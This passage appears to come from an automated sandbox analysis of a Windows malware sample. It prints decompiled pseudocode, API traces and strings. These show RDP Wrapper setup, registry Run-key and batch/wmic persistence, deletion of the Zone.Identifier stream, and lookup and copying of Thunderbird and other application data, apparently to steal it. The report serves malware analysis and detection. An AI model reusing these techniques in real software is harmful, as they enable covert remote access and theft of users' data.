0x00413563
0x00413569
0x00413573
0x00413584
0x00413596
0x0041359d
0x004135b0
0x004135c5
0x004135d8
0x004135e7
0x004135f1
0x004135fd
0x00413602
0x00413605
0x0041360e
0x00413607
0x00413607
0x00413607
0x00413605
0x00413617
0x00413619
0x0041361e
0x00413621
0x00413623
0x00413623
0x00413621
0x00413628
0x0041362f
0x0041368a
0x0041368a
0x0041368e
0x00413690
0x00413690
0x0041369c
0x00000000
0x00413631
0x00413644
0x00413649
0x0041364d
0x00000000
0x00000000
0x00413656
0x0041365b
0x0041365f
0x00413664
0x00413673
0x0041367c
0x00413683
0x004136a1
0x004136a8
0x00000000
0x004136a8
0x0041362f

APIs

GetTickCount.KERNEL32 ref: 00413467
GetModuleFileNameA.KERNEL32(00000000,?,00000000), ref: 00413483

Part of subcall function 00411E21: CreateFileA.KERNEL32(?,80000000,00000000,00000000,00000003,00000080,00000000,?,?,00000000,?,?,0041349D), ref: 00411E4E
Part of subcall function 00411E21: GetFileSize.KERNEL32(00000000,00000000,?,?,00000000,?,?,0041349D), ref: 00411E61
Part of subcall function 00411E21: ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,00000000,?,?,0041349D), ref: 00411E72
Part of subcall function 00411E21: FindCloseChangeNotification.KERNEL32(00000000,?,?,00000000,?,?,0041349D), ref: 00411E7F

Part of subcall function 00401085: GetProcessHeap.KERNEL32(00000000,?,00411E36,00400000,?,?,00000000,?,?,0041349D), ref: 0040108B
Part of subcall function 00401085: RtlAllocateHeap.NTDLL(00000000,?,?,00000000,?,?,0041349D), ref: 00401092

CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 004134EA
GetLastError.KERNEL32 ref: 004134F5
RegCreateKeyExA.KERNEL32(80000001,Software\Microsoft\Windows\CurrentVersion\Internet Settings,00000000,00000000,00000000,000F003F,00000000,?,?), ref: 0041352F
RegSetValueExA.KERNEL32(?,MaxConnectionsPer1_0Server,00000000,00000004,?,00000004), ref: 0041354E
RegSetValueExA.KERNEL32(?,MaxConnectionsPerServer,00000000,00000004,?,00000004), ref: 00413563
RegCloseKey.ADVAPI32(?), ref: 00413569
SHGetFolderPathW.SHELL32(00000000,0000001C,00000000,00000000,?,?,?,?), ref: 004135C5
lstrcatW.KERNEL32(?,\Microsoft Vision\), ref: 004135D8
CreateDirectoryW.KERNEL32(?,00000000), ref: 004135E7

Part of subcall function 00411A3C: GetModuleFileNameW.KERNEL32(00000000,0054CBF0,00000208,00000000,00000000,?,?,?,004057B9,?,00000000,00000000), ref: 00411A58
Part of subcall function 00411A3C: IsUserAnAdmin.SHELL32 ref: 00411A5E
Part of subcall function 00411A3C: FindResourceW.KERNEL32(00000000,00000066,WM_DSP,?,?,?,?,004057B9,?,00000000,00000000), ref: 00411A87
Part of subcall function 00411A3C: LoadResource.KERNEL32(00000000,00000000,?,?,?,?,004057B9,?,00000000,00000000,?,?,?,?,?,?), ref: 00411A91
Part of subcall function 00411A3C: SizeofResource.KERNEL32(00000000,00000000,?,?,?,?,004057B9,?,00000000,00000000,?,?,?,?,?,?), ref: 00411A9B
Part of subcall function 00411A3C: LockResource.KERNEL32(00000000,?,?,?,?,004057B9,?,00000000,00000000,?,?,?,?,?,?,00000000), ref: 00411AA2

Part of subcall function 00411136: CopyFileW.KERNEL32(?,?,00000000,?,00414684,?,00000000,?,?,?,?,00000000,74B60770,00000000), ref: 004111D7

Part of subcall function 0040362D: lstrcpyW.KERNEL32 ref: 00403657

Part of subcall function 00410BD9: CreateProcessW.KERNEL32 ref: 00410C14

Part of subcall function 00405EA5: VirtualFree.KERNELBASE(?,00000000,00008000,00405C2A,00000000,?,004110EE,?,?,004136B9), ref: 00405EAD

Strings

Software\Microsoft\Windows\CurrentVersion\Internet Settings, xrefs: 00413525
MaxConnectionsPer1_0Server, xrefs: 00413545
\Microsoft Vision\, xrefs: 004135CB
MaxConnectionsPerServer, xrefs: 0041355A

Memory Dump Source

Source File: 00000004.00000002.554668873.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: File$Create$Resource$CloseFindHeapModuleNameProcessValue$AdminAllocateChangeCopyCountDirectoryErrorEventFolderFreeLastLoadLockNotificationPathReadSizeSizeofTickUserVirtuallstrcatlstrcpy
String ID: MaxConnectionsPer1_0Server$MaxConnectionsPerServer$Software\Microsoft\Windows\CurrentVersion\Internet Settings$\Microsoft Vision\
API String ID: 3977721202-2552559493
Opcode ID: 0b9e63e36da2af59e41d23b8ec85192878bf4b8431f4806a879620e453638b6f
Instruction ID: dbdc3006eb0d495d609ceabf26601cc7b31dd9cbe7e190f3516bfb7783b9e381
Opcode Fuzzy Hash: 0b9e63e36da2af59e41d23b8ec85192878bf4b8431f4806a879620e453638b6f
Instruction Fuzzy Hash: 586151B1408344AFD720EF61DC85EEB77A8EB94709F00493FF68592191DB389A84CB5A

Uniqueness

Uniqueness Score: -1.00%

Function 0040E703, Relevance: 25.6, APIs: 1, Strings: 16, Instructions: 121
COMMON

Download Yara Rule

C-Code - Quality: 79%

			E0040E703(void* __ecx, void* __edx) {
				char _v8;
				char _v12;
				intOrPtr* _t11;
				void* _t14;
				void* _t15;
				void* _t19;
				void* _t20;
				void* _t25;
				void* _t33;
				void* _t42;
				intOrPtr _t43;
				void* _t67;
				intOrPtr _t71;
				void* _t80;

				_t67 = __edx;
				_push(__ecx);
				_push(__ecx);
				InitializeCriticalSection(0x54e020);
				_t71 = 5;
				asm("xorps xmm0, xmm0");
				 *0x54e070 = _t71;
				 *0x54e068 = _t71;
				_t42 = 0x18;
				asm("movups [0x54e038], xmm0");
				 *0x54e048 = 0;
				asm("movups [0x54e050], xmm0");
				 *0x54e060 = 0;
				 *0x54e06c = 0;
				_t11 = E00405F53(_t42);
				_t82 = _t11;
				if(_t11 == 0) {
					_t43 = 0;
				} else {
					 *_t11 = _t71;
					_t1 = _t11 + 4; // 0x4
					_t43 = _t1;
					asm("stosd");
					asm("stosd");
					asm("stosd");
					asm("stosd");
					asm("stosd");
				}
				 *0x54e064 = _t43;
				 *0x54e07c = 0;
				 *0x54e080 = 0; // executed
				E004032FF(0x54e048, _t67, L"TermService"); // executed
				E004032FF(0x54e054, _t67, L"%ProgramFiles%"); // executed
				_t14 = E004035E5( &_v12, L"%windir%\\System32"); // executed
				_t68 = _t14;
				_t15 = E004031D4( &_v8, _t14, _t82); // executed
				E00403437(0x54e060, _t15); // executed
				L00405EA5(_v8);
				_v8 = 0;
				L00405EA5(_v12);
				_t19 = E0040FC58(_v12);
				_t83 = _t19 - 1;
				if(_t19 != 1) {
					_t69 = 0x54e054;
					_t20 = E004031D4( &_v12, 0x54e054, __eflags);
					_t80 = 0x54e058;
					E00403437(0x54e058, _t20);
					L00405EA5(_v12);
				} else {
					E004032FF(0x54e054, _t68, L"%ProgramW6432%"); // executed
					_t69 = 0x54e054;
					_t33 = E004031D4( &_v12, 0x54e054, _t83); // executed
					_t80 = 0x54e058;
					E00403437(0x54e058, _t33); // executed
					L00405EA5(_v12);
					E004032FF(0x54e054, 0x54e054, L"%ProgramFiles%"); // executed
				}
				E0040346A(_t80, _t69, _t83, L"\\Microsoft DN1"); // executed
				E0040346A(0x54e054, _t69, _t83, L"\\Microsoft DN1"); // executed
				_t25 = E0040346A(0x54e060, _t69, _t83, L"\\rfxvmt.dll"); // executed
				E0040F71F(_t25, _t80);
				E00403437(0x54e05c, _t80); // executed
				E0040346A(0x54e05c, _t69, _t83, L"\\rdpwrap.ini"); // executed
				E0040346A(_t80, _t69, _t83, L"\\sqlmap.dll"); // executed
				E0040346A(0x54e054, _t69, _t83, L"\\sqlmap.dll"); // executed
				return 0x54e020;
			}

0x0040e703
0x0040e706
0x0040e707
0x0040e710
0x0040e718
0x0040e719
0x0040e71c
0x0040e724
0x0040e72c
0x0040e72d
0x0040e734
0x0040e73a
0x0040e741
0x0040e747
0x0040e74d
0x0040e752
0x0040e754
0x0040e766
0x0040e756
0x0040e756
0x0040e758
0x0040e758
0x0040e75f
0x0040e760
0x0040e761
0x0040e762
0x0040e763
0x0040e763
0x0040e768
0x0040e778
0x0040e77e
0x0040e784
0x0040e796
0x0040e7a3
0x0040e7a8
0x0040e7ad
0x0040e7b8
0x0040e7c0
0x0040e7c8
0x0040e7cb
0x0040e7d0
0x0040e7d5
0x0040e7d8
0x0040e80f
0x0040e814
0x0040e819
0x0040e821
0x0040e829
0x0040e7da
0x0040e7e1
0x0040e7e6
0x0040e7eb
0x0040e7f0
0x0040e7f8
0x0040e800
0x0040e808
0x0040e808
0x0040e836
0x0040e83e
0x0040e84d
0x0040e854
0x0040e861
0x0040e86d
0x0040e87a
0x0040e882
0x0040e890

APIs

InitializeCriticalSection.KERNEL32(0054E020), ref: 0040E710

Part of subcall function 00405F53: GetProcessHeap.KERNEL32(00000000,000000F4,00410477,?,74B60770,00000000,00405A34), ref: 00405F56
Part of subcall function 00405F53: RtlAllocateHeap.NTDLL(00000000), ref: 00405F5D

Part of subcall function 004031D4: ExpandEnvironmentStringsW.KERNEL32(?,?,000001FF), ref: 00403207

Part of subcall function 00403437: lstrcpyW.KERNEL32 ref: 0040345C

Part of subcall function 00405EA5: VirtualFree.KERNELBASE(?,00000000,00008000,00405C2A,00000000,?,004110EE,?,?,004136B9), ref: 00405EAD

Strings

TT, xrefs: 0040E78E
`T, xrefs: 0040E7B3
\Microsoft DN1, xrefs: 0040E82E, 0040E835, 0040E83B
\rfxvmt.dll, xrefs: 0040E843
XT, xrefs: 0040E819
%ProgramFiles%, xrefs: 0040E789, 0040E793, 0040E805
TermService, xrefs: 0040E773
T, xrefs: 0040E889
HT, xrefs: 0040E76E
`T, xrefs: 0040E848
%windir%\System32, xrefs: 0040E79B
\sqlmap.dll, xrefs: 0040E872, 0040E879, 0040E87F
XT, xrefs: 0040E7F0
%ProgramW6432%, xrefs: 0040E7DA
\rdpwrap.ini, xrefs: 0040E866
\T, xrefs: 0040E859

Memory Dump Source

Source File: 00000004.00000002.554668873.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Heap$AllocateCriticalEnvironmentExpandFreeInitializeProcessSectionStringsVirtuallstrcpy
String ID: T$%ProgramFiles%$%ProgramW6432%$%windir%\System32$HT$TermService$TT$XT$XT$\Microsoft DN1$\rdpwrap.ini$\rfxvmt.dll$\sqlmap.dll$\T$`T$`T
API String ID: 2384766215-1205521688
Opcode ID: 1a520d2a204e361a18c7539d2fd87b68ecf68caaf332ffb0a0ba49aed389b510
Instruction ID: b80cf716516139d3339e325f9bbf42a43c60d761a4303312119ab15767051eb6
Opcode Fuzzy Hash: 1a520d2a204e361a18c7539d2fd87b68ecf68caaf332ffb0a0ba49aed389b510
Instruction Fuzzy Hash: 8531E370B0020067D715BF3688575AE3EADBBA670D710043FB00A7B2D1CFBC5A4A9759

Uniqueness

Uniqueness Score: -1.00%

Function 00411136, Relevance: 19.5, APIs: 4, Strings: 7, Instructions: 278
fileCOMMON

Download Yara Rule

C-Code - Quality: 96%

			E00411136(intOrPtr* __ecx, void* __eflags, WCHAR* _a4, WCHAR* _a8, void* _a12) {
				void* _v12;
				char _v16;
				WCHAR* _v20;
				WCHAR* _v24;
				char _v28;
				char _v32;
				char _v36;
				intOrPtr* _v40;
				char _v44;
				char _v48;
				void* _t90;
				void* _t93;
				WCHAR* _t102;
				WCHAR* _t108;
				intOrPtr* _t121;
				intOrPtr* _t123;
				intOrPtr* _t135;
				intOrPtr* _t137;
				void* _t138;
				int _t142;
				intOrPtr* _t169;
				char* _t173;
				WCHAR* _t180;
				intOrPtr _t217;
				int _t243;
				WCHAR* _t254;
				WCHAR** _t255;
				char** _t256;
				void* _t257;

				_t257 = __eflags;
				_t169 = __ecx;
				_v40 = __ecx;
				E0040F481(); // executed
				_t239 = 0xa;
				_t173 =  &_v48;
				E004034A7(_t173, _t239, _t257); // executed
				_push(_t173);
				_push(_t173);
				_t90 = E00410F6E(__ecx, _t173, __ecx + 0x10); // executed
				E00410FAE(__ecx);
				_t243 = 0;
				if(_t90 == 0) {
					L4:
					_t250 = _t169 + 0x10;
					goto L5;
				} else {
					_t259 = _a4;
					if(_a4 == 0) {
						goto L4;
					} else {
						_t239 =  *((intOrPtr*)(__ecx + 0xc));
						_t255 = __ecx + 0x20;
						E00403437(_t255, E0040F76B( &_v24,  *((intOrPtr*)(__ecx + 0xc)), _t259));
						E0040F71F(L00405EA5(_v24), _t255);
						E0040362D( &_v16, _t169 + 0x4c);
						E00403335(E0040346A(_t255, _t239, _t259, "\\"), _t259,  &_v16);
						_t232 = _v16;
						L00405EA5(_v16);
						if(CopyFileW(_v20,  *_t255, 0) != 0) {
							_t233 = _t255;
							E00403221(_t255, _t239, _t256);
							E00405911(_t169 + 0x30, _t239, _t256);
							E004060AA( &_v36, _t239, _t233, _t233, _t232, _t232);
							_t256 =  &(_t256[4]);
							_t250 = _t169 + 0x10;
							E0041106C(_t169, 0x80000001, _t169 + 0x10, 0xf003f, 0);
							E00411039(_t169, _t169 + 0x18,  &_v36, 3);
							E00403036( &_v36);
							L5:
							if( *_t169 == _t243) {
								E0041106C(_t169, 0x80000001, _t250, 0xf003f, _t243); // executed
							}
							_t262 = _a12 - _t243;
							if(_a12 == _t243) {
								L11:
								__eflags = _a8;
								if(__eflags == 0) {
									L17:
									E004035E5( &_a4,  *((intOrPtr*)(_t169 + 0x20))); // executed
									_t93 = E004035E5( &_a12, L":Zone.Identifier"); // executed
									E00403335( &_a4, __eflags, _t93); // executed
									L00405EA5(_a12);
									DeleteFileW(_a4); // executed
									_t180 = _a4;
									_t243 = 1;
									__eflags = 1;
									goto L18;
								} else {
									__eflags = _a4;
									if(_a4 == 0) {
										E00403437(_t169 + 0x20,  &_v20);
									}
									_t102 = E0041106C(_t169 + 4,  *((intOrPtr*)(_t169 + 8)), _t169 + 0x14, 0x20006, _t243);
									__eflags = _t102;
									if(_t102 != 0) {
										E0040362D( &_a4, _t169 + 0x54);
										_t108 = E00411039(_t169 + 4,  &_a4, L00402FDA( &_v44, _t239, _t169 + 0x20), 1);
										L00405EA5(_a4);
										E00403036( &_v44);
										__eflags = _t108;
										if(_t108 != 0) {
											E00410FAE(_t169 + 4);
											goto L17;
										}
									}
								}
							} else {
								__imp__SHGetKnownFolderPath(_t243, _t243,  &_v28);
								E004035E5( &_v16, _v28);
								E0040346A( &_v16, _t239, _t262, L"\\programs.bat");
								E004035E5( &_v12, L"for /F \"usebackq tokens=*\" %%A in (\"");
								E0040346A(E0040346A(E0040346A( &_v12, _t239, _t262, _v16), _t239, _t262, L":start"), _t239, _t262, L"\") do %%A");
								_t121 = E00403554( &_v12,  &_v32);
								_t123 = E00403554( &_v16,  &_v24);
								E00411D35( *_t123,  *_t121, E00403261( &_v12));
								L00405EA5(_v24);
								L00405EA5(_v32);
								_t241 =  *((intOrPtr*)(_t169 + 0xc));
								E0040F76B( &_v24,  *((intOrPtr*)(_t169 + 0xc)), _t262);
								 *_t256 = L":ApplicationData";
								E0040346A( &_v24,  *((intOrPtr*)(_t169 + 0xc)), _t262,  &E00414550);
								E004035E5( &_a12, L"wmic process call create \'\"");
								_t254 = _v24;
								E0040346A(E0040346A( &_a12, _t241, _t262, _t254), _t241, _t262, L"\"\'");
								E0040346A( &_v16, _t241, _t262, L":start");
								_t135 = E00403554( &_a12,  &_v24);
								_t137 = E00403554( &_v16,  &_v32);
								_t138 = E00403261( &_a12);
								_t239 =  *_t135;
								E00411D35( *_t137,  *_t135, _t138);
								L00405EA5(_v32);
								L00405EA5(_v24);
								_t243 = 0;
								_t142 = CopyFileW(_v20, _t254, 0);
								_t217 = _a12;
								if(_t142 != 0) {
									L00405EA5(_t217);
									_a12 = 0;
									L00405EA5(_t254);
									L00405EA5(_v12);
									_v12 = 0;
									L00405EA5(_v16);
									_t169 = _v40;
									goto L11;
								} else {
									L00405EA5(_t217);
									_a12 = 0;
									L00405EA5(_t254);
									L00405EA5(_v12);
									_t180 = _v16;
									_v12 = 0;
									L18:
									L00405EA5(_t180);
								}
							}
						}
					}
				}
				L00405EA5(_v48);
				L00405EA5(_v20);
				return _t243;
			}

0x00411136
0x0041113d
0x00411144
0x00411147
0x0041114e
0x0041114f
0x00411152
0x00411157
0x00411158
0x00411160
0x00411169
0x0041116e
0x00411172
0x00411236
0x00411236
0x00000000
0x00411178
0x00411178
0x0041117b
0x00000000
0x00411181
0x00411181
0x00411187
0x00411192
0x004111a1
0x004111ad
0x004111c4
0x004111c9
0x004111cc
0x004111df
0x004111e8
0x004111ea
0x004111f5
0x004111fd
0x00411202
0x00411205
0x00411216
0x00411227
0x0041122f
0x00411239
0x0041123b
0x0041124b
0x0041124b
0x00411250
0x00411253
0x004113d6
0x004113d6
0x004113da
0x00411450
0x00411456
0x00411463
0x0041146c
0x00411474
0x0041147c
0x00411482
0x00411487
0x00411487
0x00000000
0x004113dc
0x004113dc
0x004113e0
0x004113e9
0x004113e9
0x004113fe
0x00411403
0x00411405
0x00411412
0x0041142d
0x00411437
0x0041143f
0x00411444
0x00411446
0x0041144b
0x00000000
0x0041144b
0x00411446
0x00411405
0x00411259
0x00411264
0x00411270
0x0041127d
0x0041128a
0x004112ad
0x004112b9
0x004112c7
0x004112db
0x004112e3
0x004112eb
0x004112f0
0x004112f6
0x004112fe
0x00411305
0x00411312
0x00411317
0x0041132a
0x00411337
0x00411343
0x00411351
0x0041135b
0x00411361
0x00411365
0x0041136e
0x00411376
0x0041137b
0x00411382
0x00411388
0x0041138d
0x004113b1
0x004113b8
0x004113bb
0x004113c3
0x004113cb
0x004113ce
0x004113d3
0x00000000
0x0041138f
0x0041138f
0x00411396
0x00411399
0x004113a1
0x004113a6
0x004113a9
0x00411488
0x00411488
0x00411488
0x0041138d
0x00411253
0x004111df
0x0041117b
0x00411490
0x00411498
0x004114a3

APIs

Part of subcall function 0040F481: GetModuleFileNameW.KERNEL32(00000000,00000000,000007D0,?,00000000,00413589,?,00411618,80000001,?,000F003F,00000000,00000000,Software\Microsoft\Windows\CurrentVersion\Run\,00000000,InitWindows), ref: 0040F4A2

Part of subcall function 00410F6E: RegCreateKeyExW.KERNEL32(80000001,00000000,00000000,00000000,00000001,00000001,00000000,?,00000000,74B60770,?,?,00411165,?,?), ref: 00410F8E

Part of subcall function 00410FAE: RegCloseKey.KERNEL32(?,?,0041112D,?,?,004136B9), ref: 00410FB8

CopyFileW.KERNEL32(?,?,00000000,?,00414684,?,00000000,?,?,?,?,00000000,74B60770,00000000), ref: 004111D7

Part of subcall function 0041106C: RegCreateKeyExW.ADVAPI32(74B60770,00000000,00000000,00000000,00000000,00413589,00000000,?,?,?,?,00413589,?,0041158B,80000001,?), ref: 004110A0
Part of subcall function 0041106C: RegOpenKeyExW.KERNEL32(74B60770,00000000,00000000,00413589,?,?,?,00413589,?,0041158B,80000001,?,000F003F,00000000,00000000,Software\Microsoft\Windows\CurrentVersion\Run\), ref: 004110BB

Part of subcall function 00411039: RegSetValueExW.ADVAPI32(?,74B60770,00000000,?,?,?,?,?,00411432,00000000,00000000,?,00000001,?,?,?), ref: 00411058

SHGetKnownFolderPath.SHELL32(00414550,00000000,00000000,?,?,?,?,?,00000000,74B60770,00000000), ref: 00411264
CopyFileW.KERNEL32(?,?,00000000,?,?,:start,?,00417204,wmic process call create '",00000000,?,?,?,:start,") do %%A,for /F "usebackq tokens=*" %%A in ("), ref: 00411382

Part of subcall function 0040F76B: SHGetSpecialFolderPathW.SHELL32(00000000,?,?,00000000,?,00000000,?), ref: 0040F79C

Part of subcall function 00403437: lstrcpyW.KERNEL32 ref: 0040345C

Part of subcall function 00405EA5: VirtualFree.KERNELBASE(?,00000000,00008000,00405C2A,00000000,?,004110EE,?,?,004136B9), ref: 00405EAD

Part of subcall function 0040F71F: SHCreateDirectoryExW.SHELL32(00000000,?,00000000,004111A6,00000000,?,?,?,?,00000000,74B60770,00000000), ref: 0040F725

Part of subcall function 0040362D: lstrcpyW.KERNEL32 ref: 00403657

Part of subcall function 00403335: lstrcatW.KERNEL32(00000000,74B60770), ref: 00403365

DeleteFileW.KERNEL32(?,00000000,:Zone.Identifier,?,?,?,?,?,00000000,74B60770,00000000), ref: 0041147C

Strings

:Zone.Identifier, xrefs: 0041145B
for /F "usebackq tokens=*" %%A in (", xrefs: 00411282
\programs.bat, xrefs: 00411275
") do %%A, xrefs: 0041128F
wmic process call create '", xrefs: 0041130A
:ApplicationData, xrefs: 004112FE
:start, xrefs: 00411294, 0041132F

Memory Dump Source

Source File: 00000004.00000002.554668873.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: File$Create$CopyFolderPathlstrcpy$CloseDeleteDirectoryFreeKnownModuleNameOpenSpecialValueVirtuallstrcat
String ID: ") do %%A$:ApplicationData$:Zone.Identifier$:start$\programs.bat$for /F "usebackq tokens=*" %%A in ("$wmic process call create '"
API String ID: 2154703971-4169938573
Opcode ID: c4f04cee843fbcaf35ebf3804b7fe44023eb95e3caa462233f74ea7a0d3bde6c
Instruction ID: 88c4e093d6dd73737c3aa0ee0195710feb8f01d0cf8726b165cb43df6b0fd163
Opcode Fuzzy Hash: c4f04cee843fbcaf35ebf3804b7fe44023eb95e3caa462233f74ea7a0d3bde6c
Instruction Fuzzy Hash: 75A12E71900109ABDF15EFA2C8929EE7B79AF94304B10406FB912771D2DF38AA45CB59

Uniqueness

Uniqueness Score: -1.00%

Function 04698D90, Relevance: 16.0, APIs: 7, Strings: 2, Instructions: 208fileCOMMON

Download Yara Rule

APIs

GetVersionExW.KERNEL32 ref: 04698E33

Part of subcall function 04697760: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00000000,000000FF,00000000,00000000,00000114,74E05420,0469908D,00000000,00000000,74E5F560), ref: 04697770
Part of subcall function 04697760: _malloc.LIBCMT ref: 0469777C
Part of subcall function 04697760: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00000000,000000FF,00000000,00000000), ref: 04697796
Part of subcall function 04697760: _free.LIBCMT ref: 046977A1

GetVersionExW.KERNEL32(?,?,?,?,?,?,?,?,?), ref: 04698EDB
CreateFileW.KERNEL32(00000000,?,00000003,00000000,?,?,00000000), ref: 04698F09
CreateFileA.KERNEL32(00000000,?,00000003,00000000,?,?,00000000), ref: 04698F1C
GetLastError.KERNEL32 ref: 04698F2B
_free.LIBCMT ref: 04698F35

Strings

cannot open file at line %d of [%.10s], xrefs: 04698F85
ed759d5a9edb3bba5f48f243df47be29e3fe8cd7, xrefs: 04698F7B

Memory Dump Source

Source File: 00000004.00000003.336122914.0000000004690000.00000040.00000001.sdmp, Offset: 04690000, based on PE: true

Similarity

API ID: ByteCharCreateFileMultiVersionWide_free$ErrorLast_malloc
String ID: cannot open file at line %d of [%.10s]$ed759d5a9edb3bba5f48f243df47be29e3fe8cd7
API String ID: 3782002744-850067789
Opcode ID: 88809f737b329e7eddb4d9da40ee96ae0d63859e9d93ee25e396976eed30e78c
Instruction ID: 2344b85372d5507c6d350745eee107942a69cbef79879f3feeb43816e0afce8e
Opcode Fuzzy Hash: 88809f737b329e7eddb4d9da40ee96ae0d63859e9d93ee25e396976eed30e78c
Instruction Fuzzy Hash: 407182B16153019FD724DF29E84566BB7E8FB88718F00892DF59AC7380E774E944CB92

Uniqueness

Uniqueness Score: -1.00%

Function 0040C118, Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 56
registrystringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040C118(WCHAR* __ecx, char* __edx, void* __eflags) {
				void* _v8;
				int _v12;
				int _v16;
				short _v536;
				long _t21;
				char* _t32;
				WCHAR* _t33;

				_v12 = 0x104;
				_v16 = 1;
				_t32 = __edx;
				_t33 = __ecx;
				E00401052( &_v536, 0, 0x104);
				lstrcpyW( &_v536, L"Software\\Microsoft\\Windows\\CurrentVersion\\App Paths\\");
				lstrcatW( &_v536, _t33);
				_t21 = RegOpenKeyExW(0x80000002,  &_v536, 0, 1,  &_v8); // executed
				if(_t21 != 0) {
					return 0;
				}
				RegQueryValueExW(_v8, L"Path", 0,  &_v16, _t32,  &_v12);
				RegCloseKey(_v8);
				return 1;
			}

0x0040c12c
0x0040c136
0x0040c13c
0x0040c13e
0x0040c140
0x0040c154
0x0040c162
0x0040c17b
0x0040c183
0x00000000
0x0040c1ab
0x0040c198
0x0040c1a1
0x00000000

APIs

lstrcpyW.KERNEL32 ref: 0040C154
lstrcatW.KERNEL32(?,thunderbird.exe), ref: 0040C162
RegOpenKeyExW.KERNEL32(80000002,?,00000000,00000001,0040A729), ref: 0040C17B
RegQueryValueExW.ADVAPI32(0040A729,Path,00000000,?,?,?), ref: 0040C198
RegCloseKey.ADVAPI32(0040A729), ref: 0040C1A1

Strings

Path, xrefs: 0040C190
thunderbird.exe, xrefs: 0040C15A
Software\Microsoft\Windows\CurrentVersion\App Paths\, xrefs: 0040C14E

Memory Dump Source

Source File: 00000004.00000002.554668873.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: CloseOpenQueryValuelstrcatlstrcpy
String ID: Path$Software\Microsoft\Windows\CurrentVersion\App Paths\$thunderbird.exe
API String ID: 3135247354-1374996286
Opcode ID: 14ae2aa9d270cb3cef50989f465333ec15a1f0aa9fea3b159653792e7dfae7b8
Instruction ID: 41eefbdd8383489cfa8434fb0dc5161a6aa0513f8406a479b9478fbfa2c9b186
Opcode Fuzzy Hash: 14ae2aa9d270cb3cef50989f465333ec15a1f0aa9fea3b159653792e7dfae7b8
Instruction Fuzzy Hash: 7A1152B294010CBFE710ABE5EC89FDA7B7CEB58304F104176B605E2190E6749E448B65

Uniqueness

Uniqueness Score: -1.00%

Function 0040C4A8, Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 371
fileCOMMON

Download Yara Rule

C-Code - Quality: 92%

			E0040C4A8(intOrPtr __ecx, void* __eflags, char _a4, signed int _a8, char _a12, char _a16, intOrPtr _a20) {
				WCHAR* _v12;
				char _v16;
				WCHAR* _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				char _v36;
				char _v40;
				char _v44;
				char _v48;
				intOrPtr _v52;
				char _v56;
				char _v60;
				char _v64;
				char _v68;
				char _v72;
				intOrPtr _v76;
				char _v80;
				char _v84;
				char _v88;
				void* _t130;
				void* _t136;
				void* _t140;
				void* _t144;
				int _t148;
				int _t154;
				int _t155;
				int _t156;
				intOrPtr* _t160;
				void* _t161;
				char _t165;
				char _t177;
				char _t178;
				char _t188;
				char* _t189;
				char* _t190;
				char* _t191;
				void* _t192;
				void* _t194;
				char _t198;
				char _t223;
				intOrPtr _t233;
				char* _t251;
				char* _t255;
				void* _t322;
				void* _t323;
				void* _t324;
				void* _t325;
				void* _t326;
				void* _t327;
				char _t331;
				WCHAR* _t337;
				intOrPtr _t338;
				void* _t339;
				void* _t340;

				_t343 = __eflags;
				_v24 = _v24 & 0x00000000;
				_v28 = _v28 & 0x00000000;
				_t233 = __ecx;
				_t322 = 0x1a;
				_v52 = __ecx;
				E0040F76B( &_v12, _t322, __eflags); // executed
				_t329 = "\\";
				E0040346A( &_v12, _t322, __eflags, "\\"); // executed
				_t323 = 8;
				_t130 = E004034A7( &_v48, _t323, _t343); // executed
				E00403335( &_v12, _t343, _t130); // executed
				L00405EA5(_v48);
				_t336 = L".tmp";
				E0040346A( &_v12, _t323, _t343, L".tmp"); // executed
				_t324 = 0x1a;
				E0040F76B( &_v20, _t324, _t343); // executed
				E0040346A( &_v20, _t324, _t343, _t329); // executed
				_t325 = 8;
				_t136 = E004034A7( &_v48, _t325, _t343); // executed
				E00403335( &_v20, _t343, _t136); // executed
				L00405EA5(_v48);
				E0040346A( &_v20, _t325, _t343, _t336); // executed
				_t344 = _a12;
				_t251 =  &_v48;
				if(_a12 == 0) {
					_push(0x1c);
				} else {
					_push(0x1a);
				}
				_pop(_t326); // executed
				_t140 = E0040F76B(_t251, _t326, _t344); // executed
				E00403437( &_v24, _t140); // executed
				L00405EA5(_v48);
				E0040346A( &_v24, _t326, _t344, _a4); // executed
				_t345 = _a12;
				_t255 =  &_a12;
				if(_a12 == 0) {
					_push(0x1c);
				} else {
					_push(0x1a);
				}
				_pop(_t327); // executed
				_t144 = E0040F76B(_t255, _t327, _t345); // executed
				E00403437( &_v28, _t144); // executed
				L00405EA5(_a12);
				E0040346A( &_v28, _t327, _t345, _a8); // executed
				_t148 = PathFileExistsW(_v24); // executed
				_t337 = _v28;
				if(_t148 == 0) {
					L12:
					_t331 = 0;
					goto L13;
				} else {
					_t154 = PathFileExistsW(_t337); // executed
					if(_t154 == 0) {
						goto L12;
					}
					_t155 = CopyFileW(_v24, _v12, 0); // executed
					if(_t155 == 0) {
						goto L12;
					}
					_t156 = CopyFileW(_t337, _v20, 0); // executed
					if(_t156 == 0) {
						goto L12;
					}
					E00403437( &_v24,  &_v12); // executed
					_t160 = E00403554( &_v24,  &_a12); // executed
					_t161 =  *((intOrPtr*)(_t233 + 0x30))( *_t160,  &_v56);
					_t268 = _a12;
					L00405EA5(_a12);
					if(_t161 == 0) {
						_v32 = _v32 & 0x00000000;
						_a8 = _a8 & 0x00000000;
						_t165 = E0040CED9(_t268, _t268,  &_v32,  &_a8); // executed
						_t340 = _t339 + 0x10;
						_t331 = 1;
						__eflags = _t165;
						if(_t165 == 0) {
							L36:
							 *((intOrPtr*)(_t233 + 0x60))();
							 *((intOrPtr*)(_t233 + 0x34))();
							E0040362D(_t340,  &_v12);
							E0040FF0B(_v56);
							E0040362D(_t340,  &_v20);
							E0040FF0B(_v16);
							L13:
							L00405EA5(_v20);
							L00405EA5(_v12);
							L00405EA5(_t337);
							L00405EA5(_v24);
							return _t331;
						}
